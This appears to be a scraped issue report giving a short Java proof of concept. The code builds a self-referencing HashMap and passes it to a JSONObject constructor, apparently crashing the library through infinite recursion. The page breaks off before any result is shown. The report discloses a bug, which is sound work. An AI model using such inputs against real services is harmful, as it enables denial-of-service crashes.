We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
poc as follow:
public class POC { public static void main(String[] args) throws JSONException { HashMap<String,Object> map=new HashMap<>(); map.put("t",map); JSONObject jsonObject=new JSONObject(map); } }
and the result: